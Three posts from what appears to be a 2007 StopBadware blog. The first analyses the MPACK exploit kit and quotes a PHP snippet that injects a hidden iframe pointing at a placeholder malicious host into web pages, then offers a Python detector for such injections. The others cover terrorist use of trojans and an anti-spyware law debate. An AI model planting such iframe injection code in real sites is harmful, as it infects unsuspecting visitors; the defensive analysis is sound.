Dealing with weaponized exploits

Posted on July 13, 2007 - 15:08 by zeroday

The folks at SANS published an excellent write-up which breaks down the MPACK exploit package. MPACK confirmed a lot of theories that SBW had regarding exploit patterns recorded over time. In particular, it uses nit-like behavior that homes in on the "scalp" of an HTML document, such as the <body> and <html> tags. The following code was pointed out in the SANS entry:

$file_types = array('php', 'htm', 'html', 'tpl');
$iframed_content = str_replace('</body>',
    '<iframe src=http://[EVIL].info/counter style=display:none></iframe></body>',
    $content);

The code above looks for the closing body tag and inserts an invisible iframe immediately before it. If we break down the iframe tag, its attributes achieve the following:

  • src = the URL of the malicious code that is loaded
  • style = makes the iframe invisible using the CSS display:none trick

Other variants used to induce invisibility include width="0" and height="0", which have the same effect as style=display:none.

The StopBadware team has seen this pattern for quite some time, and it is possible that other packaged exploits use this style. In less technically impressive distributions it was more common to see the exploit appended to the file. This would be accomplished by using the "echo" command to simply append the iframe to the end of any HTML or PHP file. It is fair to say that if an iframe (or JavaScript) occurs before the opening html tag (<html>) or after the closing html tag (</html>), someone has injected code into that page.
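As an added example (not code from this post or from the SANS write-up), here is a small Python checker that applies the heuristics above to a page body: it flags iframes or scripts that sit outside the <html>...</html> envelope, and iframes hidden with display:none or with zero width and height. The sample page and its hostname are constructed placeholders.

```python
import re

# Constructed sample page: one MPACK-style hidden iframe injected before
# </body>, plus a second iframe appended after </html> in the cruder
# "echo >> index.html" style. The hostname is a placeholder, not an IoC.
SAMPLE_PAGE = """<html><head><title>Shop</title></head>
<body><p>Welcome</p>
<iframe src=http://EVIL-PLACEHOLDER.invalid/counter style=display:none></iframe></body></html>
<iframe src="http://EVIL-PLACEHOLDER.invalid/x" width="0" height="0"></iframe>
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
HIDDEN_RE = re.compile(r"display\s*:\s*none", re.IGNORECASE)
ZERO_ATTR_RE = re.compile(r'\b(width|height)\s*=\s*"?0"?', re.IGNORECASE)


def find_injections(html):
    """Return a list of (reason, tag) findings for one page body.

    Reasons: a tag placed before <html> or after </html>, or an iframe
    hidden via display:none or via width="0" height="0".
    """
    findings = []
    lower = html.lower()
    open_html = lower.find("<html")
    close_html = lower.rfind("</html>")
    tags = list(IFRAME_RE.finditer(html)) + list(SCRIPT_RE.finditer(html))
    for m in tags:
        tag, pos = m.group(0), m.start()
        # Anything outside the html envelope was almost certainly appended
        # or prepended to the file rather than authored in place.
        if open_html != -1 and pos < open_html:
            findings.append(("before <html>", tag))
        elif close_html != -1 and pos > close_html:
            findings.append(("after </html>", tag))
        if tag.lower().startswith("<iframe"):
            if HIDDEN_RE.search(tag):
                findings.append(("hidden iframe (display:none)", tag))
            else:
                zeroed = {a.lower() for a in ZERO_ATTR_RE.findall(tag)}
                if zeroed == {"width", "height"}:
                    findings.append(("hidden iframe (zero size)", tag))
    return findings


if __name__ == "__main__":
    for reason, tag in find_injections(SAMPLE_PAGE):
        print(f"{reason}: {tag}")
```

A visible, normally sized iframe inside the envelope produces no finding, so the check is cheap enough to run across every file in a hosting account.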

The SANS entry goes on to provide reasons behind the success of these attacks. The analysis confirms a great many theories we had come up with, in particular the ability to compromise a single account and leverage that into a system-wide exploit. This is particularly effective when used against "value" hosting providers who push 1000 or more websites onto a single box. It would make sense for hosting providers who are on our lists to consider following the changes recommended by this guide [1] and set up suExec or a proper chroot jail for the webserver. Before embarking on this task, realize that there are issues to setting up suExec or a chroot jail. These issues include:

  • increased time to set up
  • more support tickets due to increased complexity
  • more resource use (RAM, processor), meaning fewer users per server

However, the upside is that a single compromise will not lead to the infection of all the other users on your system. Thousands of support calls, and possibly the loss of revenue as an angry (and infected) userbase migrates to a more secure hosting provider, are the potential downside of not implementing a more secure environment. StopBadware will be making a point of educating website owners in our community to ask their hosting providers for these security measures, to ensure they seek out more secure environments.

[1] http://www.seaoffire.net/fcgi-faq.html

Badware's terrorist connection

Posted on July 6, 2007 - 17:16 by egeorge

The Washington Post today has a fascinating look at how three UK-based terrorists used badware and phishing scams to finance their criminal operations. The scale of the scams is mind-boggling, though unfortunately not as unusual as you might think.

The article notes that, "All told, investigators said al-Daour and his compatriots made more than $3.5 million in fraudulent charges using credit card accounts they stole via online phishing scams and the distribution of Trojan horses -- computer programs embedded in innocent-looking e-mail messages or Web sites that give criminals control over infected computers."

This highlights the strong ties between badware and crime of all stripes. The identity and financial information being stolen through trojans and keyloggers isn't just lining the pockets of rich gangsters; it's also helping finance acts of terrorism.

Read the full article here (may require free registration).

More debate over anti-spyware laws

Posted on July 2, 2007 - 13:23 by egeorge

Debate over several proposed U.S. federal anti-spyware laws continued at the Anti-Spyware Coalition conference last week at Harvard. In a panel on public policy moderated by StopBadware's own John Palfrey, panelists from the Center for Democracy and Technology and the Federal Trade Commission disagreed on the best way forward for legislation that combats spyware.

The three potential bills at stake are the I-Spy Act and the Spy Act, both recently passed in the House, and the Counter Spy Act, recently re-introduced in the Senate after failing to pass in previous sessions. Ari Schwartz, deputy director of the CDT, said that the CDT supports all three bills, on the principle that any further clarification of the illegality of spyware is a good thing. Tracy Shapiro, an attorney at the FTC, said that the FTC feels it already has enough legal power at its disposal and that further legislation might actually cause confusion.

InfoWorld highlights the debate in an article here. You can also read more about the I-Spy and Spy acts in earlier StopBadware blog posts here.